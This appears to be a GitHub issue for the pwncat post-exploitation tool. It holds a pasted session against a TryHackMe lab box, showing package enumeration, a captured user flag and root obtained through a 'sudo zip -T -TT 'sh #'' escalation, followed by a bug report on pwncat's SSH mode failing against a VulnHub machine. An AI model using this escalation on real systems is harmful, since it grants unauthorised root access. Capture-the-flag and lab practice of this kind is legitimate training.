[36mopenjdk-8-jre-headless:amd[39m version [34m8u242-b08-0ubuntu3[39m
[36mopenssh-client[39m version [34m1:7.2p2-4ubuntu2.8[39m
[36mopenssh-server[39m version [34m1:7.2p2-4ubuntu2.8[39m
[36mopenssh-sftp-server[39m version [34m1:7.2p2-4ubuntu2.8[39m
[36mopenssl[39m version [34m1.0.2g-1ubuntu4.15[39m
[36mos-prober[39m version [34m1.70ubuntu3.3[39m
[36mparted[39m version [34m3.2-15ubuntu0.1[39m
[36mpasswd[39m version [34m1:4.2-3.1ubuntu5.4[39m
[36mpciutils[39m version [34m1:3.3.1-1.1ubuntu1[39m
[36mperl-base[39m version [34m5.22.1-9ubuntu0.6[39m
[36mplymouth[39m version [34m0.9.2-3ubuntu13.5[39m
[36mplymouth-theme-ubuntu-text[39m version [34m0.9.2-3ubuntu13.5[39m
[36mpopularity-contest[39m version [34m1.64ubuntu2[39m
[36mpowermgmt-base[39m version [34m1.31+nmu1[39m
[36mprocps[39m version [34m2:3.3.10-4ubuntu2.[39m
[36mpsmisc[39m version [34m22.21-2.1ubuntu0.1[39m
[36mpython-apt-common[39m version [34m1.1.0beta1ubuntu0[39m
[36mpython3[39m version [34m3.5.1-3[39m
[36mpython3-apt[39m version [34m1.1.0beta1ubuntu0[39m
[36mpython3-chardet[39m version [34m2.3.0-2[39m
[36mpython3-commandnotfound[39m version [34m0.3ubuntu16.04.2[39m
[36mpython3-dbus[39m version [34m1.2.0-3[39m
[36mpython3-distupgrade[39m version [34m1:16.04.29[39m
[36mpython3-gdbm:amd64[39m version [34m3.5.1-1[39m
[36mpython3-gi[39m version [34m3.20.0-0ubuntu1[39m
[36mpython3-minimal[39m version [34m3.5.1-3[39m
[36mpython3-pkg-resources[39m version [34m20.7.0-1[39m
[36mpython3-requests[39m version [34m2.9.1-3ubuntu0.1[39m
[36mpython3-six[39m version [34m1.10.0-3[39m
[36mpython3-update-manager[39m version [34m1:16.04.17[39m
[36mpython3-urllib3[39m version [34m1.13.1-2ubuntu0.16[39m
[36mpython3.5[39m version [34m3.5.2-2ubuntu016.[39m
[36mpython3.5-minimal[39m version [34m3.5.2-2ubuntu016.[39m
[36mreadline-common[39m version [34m6.3-8ubuntu2[39m
[36mresolvconf[39m version [34m1.78ubuntu7[39m
[36mrsync[39m version [34m3.1.1-3ubuntu1.3[39m
[36mrsyslog[39m version [34m8.16.0-1ubuntu3.1[39m
[36msed[39m version [34m4.2.2-7[39m
[36msensible-utils[39m version [34m0.0.9ubuntu0.16.04[39m
[36msgml-base[39m version [34m1.26+nmu4ubuntu1[39m
[36mshared-mime-info[39m version [34m1.5-2ubuntu0.2[39m
[36mssh[39m version [34m1:7.2p2-4ubuntu2.8[39m
[36mssh-import-id[39m version [34m5.5-0ubuntu1[39m
[36mstrace[39m version [34m4.11-1ubuntu3[39m
[36msudo[39m version [34m1.8.16-0ubuntu1.9[39m
[36msystemd[39m version [34m229-4ubuntu21.27[39m
[36msystemd-sysv[39m version [34m229-4ubuntu21.27[39m
[36msysv-rc[39m version [34m2.88dsf-59.3ubuntu[39m
[36msysvinit-utils[39m version [34m2.88dsf-59.3ubuntu[39m
[36mtar[39m version [34m1.28-2.1ubuntu0.1[39m
[36mtasksel[39m version [34m3.34ubuntu3[39m
[36mtasksel-data[39m version [34m3.34ubuntu3[39m
[36mtcpd[39m version [34m7.6.q-25[39m
[36mtcpdump[39m version [34m4.9.3-0ubuntu0.16.[39m
[36mtelnet[39m version [34m0.17-40[39m
[36mtime[39m version [34m1.7-25.1[39m
[36mtzdata[39m version [34m2019c-0ubuntu0.16.[39m
[36mubuntu-advantage-tools[39m version [34m10ubuntu0.16.04.1[39m
[36mubuntu-keyring[39m version [34m2012.05.19[39m
[36mubuntu-minimal[39m version [34m1.361.4[39m
[36mubuntu-mono[39m version [34m14.04+16.04.201803[39m
[36mubuntu-release-upgrader-co[39m version [34m1:16.04.29[39m
[36mubuntu-standard[39m version [34m1.361.4[39m
[36mucf[39m version [34m3.0036[39m
[36mudev[39m version [34m229-4ubuntu21.27[39m
[36mufw[39m version [34m0.35-0ubuntu2[39m
[36munzip[39m version [34m6.0-20ubuntu1[39m
[36mupdate-manager-core[39m version [34m1:16.04.17[39m
[36mureadahead[39m version [34m0.100.0-19.1[39m
[36musbutils[39m version [34m1:007-4[39m
[36mutil-linux[39m version [34m2.27.1-6ubuntu3.10[39m
[36muuid-runtime[39m version [34m2.27.1-6ubuntu3.10[39m
[36mvim-common[39m version [34m2:7.4.1689-3ubuntu[39m
[36mvim-tiny[39m version [34m2:7.4.1689-3ubuntu[39m
[36mwamerican[39m version [34m7.1-1[39m
[36mwbritish[39m version [34m7.1-1[39m
[36mwget[39m version [34m1.17.1-1ubuntu1.5[39m
[36mwhiptail[39m version [34m0.52.18-1ubuntu2[39m
[36mwireless-regdb[39m version [34m2018.05.09-0ubuntu[39m
[36mx11-common[39m version [34m1:7.7+13ubuntu3.1[39m
[36mx11proto-core-dev[39m version [34m7.0.31-1~ubuntu16.[39m
[36mx11proto-input-dev[39m version [34m2.3.1-1[39m
[36mx11proto-kb-dev[39m version [34m1.0.7-0ubuntu1[39m
[36mxauth[39m version [34m1:1.0.9-1ubuntu2[39m
[36mxdg-user-dirs[39m version [34m0.15-2ubuntu6.16.0[39m
[36mxkb-data[39m version [34m2.16-1ubuntu1[39m
[36mxml-core[39m version [34m0.13+nmu2[39m
[36mxorg-sgml-doctools[39m version [34m1:1.11-1[39m
[36mxtrans-dev[39m version [34m1.3.5-1[39m
[36mzip[39m version [34m3.0-11[39m
[36mzlib1g:amd64[39m version [34m1:1.2.8.dfsg-2ubun[39m
SYSTEM.SUDO_VERSION Facts by pwncat.enumerate.system
[33msudo[39m version [36m1.8.16[39m (may be [31mvulnerable[39m)
(local) pwncat$ privesc
[22:17:42] no techniques found privesc.py:124
(local) pwncat$
[22:17:44] pwncat is ready 🐈 victim.py:759

(remote) merlin@ubuntu:/home/skyfuck$
(remote) merlin@ubuntu:/home/skyfuck$ touch a
touch: cannot touch 'a': Permission denied
(remote) merlin@ubuntu:/home/skyfuck$ cd ~
(remote) merlin@ubuntu:$ ls
user.txt
(remote) merlin@ubuntu:$ cat user.txt
THM{GhostCat_1s_so_cr4sy}
(remote) merlin@ubuntu:~$
[22:18:19] local terminal restored victim.py:781
(local) pwncat$ privesc
[22:18:23] no techniques found privesc.py:124
(local) pwncat$
[22:18:27] pwncat is ready 🐈 victim.py:759

(remote) merlin@ubuntu:$ ls
a user.txt ziEoiE3x ziVYvBgM
(remote) merlin@ubuntu:$ ls -la
total 44
drwxr-xr-x 4 merlin merlin 4096 Jul 15 13:20 .
drwxr-xr-x 4 root root 4096 Mar 10 21:58 ..
-rw-rw-r-- 1 merlin merlin 0 Jul 15 13:18 a
-rw------- 1 root root 2090 Mar 10 22:54 .bash_history
-rw-r--r-- 1 merlin merlin 220 Mar 10 17:57 .bash_logout
-rw-r--r-- 1 merlin merlin 3771 Mar 10 17:57 .bashrc
drwx------ 2 merlin merlin 4096 Mar 10 17:59 .cache
drwxrwxr-x 2 merlin merlin 4096 Mar 10 22:01 .nano
-rw-r--r-- 1 merlin merlin 655 Mar 10 17:57 .profile
-rw-r--r-- 1 merlin merlin 0 Mar 10 17:59 .sudo_as_admin_successful
-rw-rw-r-- 1 merlin merlin 26 Mar 10 22:01 user.txt
-rw------- 1 root root 152 Jul 15 13:20 ziEoiE3x
-rw------- 1 root root 152 Jul 15 13:18 ziVYvBgM
(remote) merlin@ubuntu:$
[22:20:24] local terminal restored victim.py:781
(local) pwncat$ tamper
(local) pwncat$ reset
(local) pwncat$ privesc
[22:21:11] no techniques found privesc.py:124
(local) pwncat$
[22:21:31] pwncat is ready 🐈 victim.py:759
(remote) merlin@ubuntu:$ TF=$(mktemp -u)
(remote) merlin@ubuntu:~$ sudo zip $TF /etc/hosts -T -TT 'sh #'
adding: etc/hosts (deflated 31%)
[\033[01;31m](remote)[\033[00m] [\033[01;33m]\u@\h[\033[00m]:[\033[01;36m]\w[\033[00m]$
rm: cannot remove ''$'\r': No such file or directory
[\033[01;31m](remote)[\033[00m] [\033[01;33m]\u@\h[\033[00m]:[\033[01;36m]\w[\033[00m]$
[\033[01;31m](remote)[\033[00m] [\033[01;33m]\u@\h[\033[00m]:[\033[01;36m]\w[\033[00m]$
[\033[01;31m](remote)[\033[00m] [\033[01;33m]\u@\h[\033[00m]:[\033[01;36m]\w[\033[00m]$
[\033[01;31m](remote)[\033[00m] [\033[01;33m]\u@\h[\033[00m]:[\033[01;36m]\w[\033[00m]$
[\033[01;31m](remote)[\033[00m] [\033[01;33m]\u@\h[\033[00m]:[\033[01;36m]\w[\033[00m]$ id
uid=0(root) gid=0(root) groups=0(root)
[\033[01;31m](remote)[\033[00m] [\033[01;33m]\u@\h[\033[00m]:[\033[01;36m]\w[\033[00m]$ cd /root
[\033[01;31m](remote)[\033[00m] [\033[01;33m]\u@\h[\033[00m]:[\033[01;36m]\w[\033[00m]$ ;s
sh: 8: Syntax error: ";" unexpected
[\033[01;31m](remote)[\033[00m] [\033[01;33m]\u@\h[\033[00m]:[\033[01;36m]\w[\033[00m]$ ls
root.txt ufw
[\033[01;31m](remote)[\033[00m] [\033[01;33m]\u@\h[\033[00m]:[\033[01;36m]\w[\033[00m]$

If you are pasting terminal output or code snippets, place them in a code block (three backticks) in accordance with Markdown formatting for easier reading

Describe the bug
Trying to use the programs ssh capabilities following prompts for giving it a username and password and then when the host option is added it results in an error as seem below

TypeError: recv() takes 2 positional arguments but 3 were given

It might be a really simple fix that I'm missing, but I can't seem to find a fix for it anywhere.

Describe the target system
The machine is Vulnix from vulnhub
Linux vulnix 3.2.0-29-generic-pae #46-Ubuntu SMP Fri Jul 27 17:25:43 UTC 2012 i686 i686 i386 GNU/Linux

To Reproduce
Steps to reproduce the behavior:
I had already uploaded ssh keys and tested that they work with normal ssh
using pwncat in the following syntax pwncat --ssh -H vulnix -u vulnix -i id_rsa and also there is a user who's password is easy to bruteforce using the following syntax pwncat --ssh -H vulnix -u user -P letmein results in the same error

Expected behavior
Was expecting both commands to result in a shell of some sort.

Screenshots
If applicable, add screenshots to help explain your problem.

The first two screenshots are just to confirm that the methods work normally

The pwncat results -